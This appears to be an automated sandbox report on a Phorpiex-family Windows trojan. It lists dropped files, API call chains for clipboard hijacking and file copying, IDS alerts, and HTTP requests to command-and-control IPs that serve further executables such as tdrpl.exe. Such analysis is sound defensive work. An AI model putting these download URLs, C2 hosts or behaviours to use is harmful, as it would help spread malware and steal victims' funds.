Source: Bjl3geiFEK.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
Source: Bjl3geiFEK.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Code function: 1_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 1_2_004068E0
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Code function: 1_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 1_2_004067A0
Source: C:\Windows\sysppvrdnvs.exe, Code function: 2_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 2_2_004068E0
Source: C:\Windows\sysppvrdnvs.exe, Code function: 2_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 2_2_004067A0
Source: C:\Windows\sysppvrdnvs.exe, Code function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose, 17_2_004068E0
Source: C:\Windows\sysppvrdnvs.exe, Code function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW, 17_2_004067A0

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49734 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:50345 -> 5.75.95.114:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49731 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.4:49734
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:50345 -> 5.239.153.192:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:57562 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.4:49730
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:57563 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.4:49730
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.4:49731
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe | Code function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary
Source: global traffic | TCP traffic: 192.168.2.4:49735 -> 2.186.114.89:40500
Source: global traffic | TCP traffic: 192.168.2.4:57564 -> 2.63.29.22:40500
Source: global traffic | UDP traffic: 192.168.2.4:50345 -> 5.239.153.192:40500
Source: global traffic | UDP traffic: 192.168.2.4:50345 -> 5.75.95.114:40500
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 28 Oct 2024 10:11:12 GMT | Content-Type: application/octet-stream | Content-Length: 85504 | Last-Modified: Sun, 20 Oct 2024 18:13:32 GMT | Connection: keep-alive | ETag: "6715484c-14e00" | Accept-Ranges: bytes
Source: Joe Sandbox View | IP Address: 185.215.113.66
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | IP Address: 91.202.233.141
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View | ASN Name: TCIIR
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 91.202.233.141:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:57562 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:57563 -> 185.215.113.66:80
Source: global traffic | HTTP traffic detected: GET /tdrpl.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.215.113.66 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /dwntbl HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.66
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmp, Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.dr | String found in binary or memory: http://185.215.113.66/
Source: sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/1
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/1C:
Source: sysppvrdnvs.exe, 00000002.00000003.1903094197.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/1G0td
Source: sysppvrdnvs.exe, 00000002.00000003.1936945817.00000000006BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/1JJC:
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/1LMEM0P
Source: sysppvrdnvs.exe, 00000002.00000003.1937078841.0000000000699000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/1aenh.dll
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/1uK
Source: sysppvrdnvs.exe, 00000002.00000002.2003916309.0000000002EEC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/2
Source: sysppvrdnvs.exe, 00000002.00000002.2003916309.0000000002EEC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/2(Bf
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/2C:
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.00000000006BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/2JJC:
Source: 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.dr | String found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
Source: sysppvrdnvs.exe | String found in binary or memory: http://185.215.113.66/tdrp.exe
Source: 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.dr | String found in binary or memory: http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/tdrpl.exe
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/tdrpl.exeb1E
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/tdrpl.exek1L
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.66/tdrpl.exer
Source: 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.dr | String found in binary or memory: http://91.202.233.141/
Source: sysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000002.2004958997.0000000005B0D000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntbl
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000061E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntbl2C
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntblan
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntblhy
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000061E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntbllvCkd
Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/dwntblt-InLMEMH
Source: 818921588.exe.2.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 818921588.exe.2.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000136A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA

                              Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: 18.0.818921588.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.33080.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.33080.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.818921588.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 33080.scr PID: 7112, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 3060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 4628, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 818921588.exe PID: 1516, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, type: DROPPED
Source: Yara match | File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\33080.scr, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\818921588.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_0040FB45 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\33080.scr | Code function: 1_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_0040FB45 NtQueryVirtualMemory
Source: C:\Windows\sysppvrdnvs.exe | Code function: 2_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040FB45 NtQueryVirtualMemory
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Users\user\AppData\Local\Temp\33080.scr | File created: C:\Windows\sysppvrdnvs.exe
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004084D01_2_004084D0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004084F91_2_004084F9
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004040901_2_00404090
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040AEB01_2_0040AEB0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004049701_2_00404970
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040F9081_2_0040F908
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004084D02_2_004084D0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004084F92_2_004084F9
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004040902_2_00404090
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040AEB02_2_0040AEB0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004049702_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040F9082_2_0040F908
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084D017_2_004084D0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084F917_2_004084F9
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040409017_2_00404090
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040AEB017_2_0040AEB0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040497017_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040F90817_2_0040F908
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\33080.scr 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                              Source: Bjl3geiFEK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@27/15@0/7
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,1_2_00406F70
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00406660 CoInitialize,CoCreateInstance,wsprintfW,wsprintfW,1_2_00406660
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exeJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\sysppvrdnvs.exeMutant created: \Sessions\1\BaseNamedObjects\mmn7nnm8na
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3236:120:WilError_03
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile created: C:\Users\user\AppData\Local\Temp\33080.scrJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCommand line argument: 778g87b7b8787b70_2_004B10B0
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Command line argument: %s\%s 0_2_004B10B0
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Command line argument: %s\%d%s 0_2_004B10B0
Source: Bjl3geiFEK.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Users\user\Desktop\Bjl3geiFEK.exe "C:\Users\user\Desktop\Bjl3geiFEK.exe"
Source: C:\Users\user\Desktop\Bjl3geiFEK.exe, Process created: C:\Users\user\AppData\Local\Temp\33080.scr "C:\Users\user\AppData\Local\Temp\33080.scr" /S
Source: C:\Users\user\AppData\Local\Temp\33080.scr, Process created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
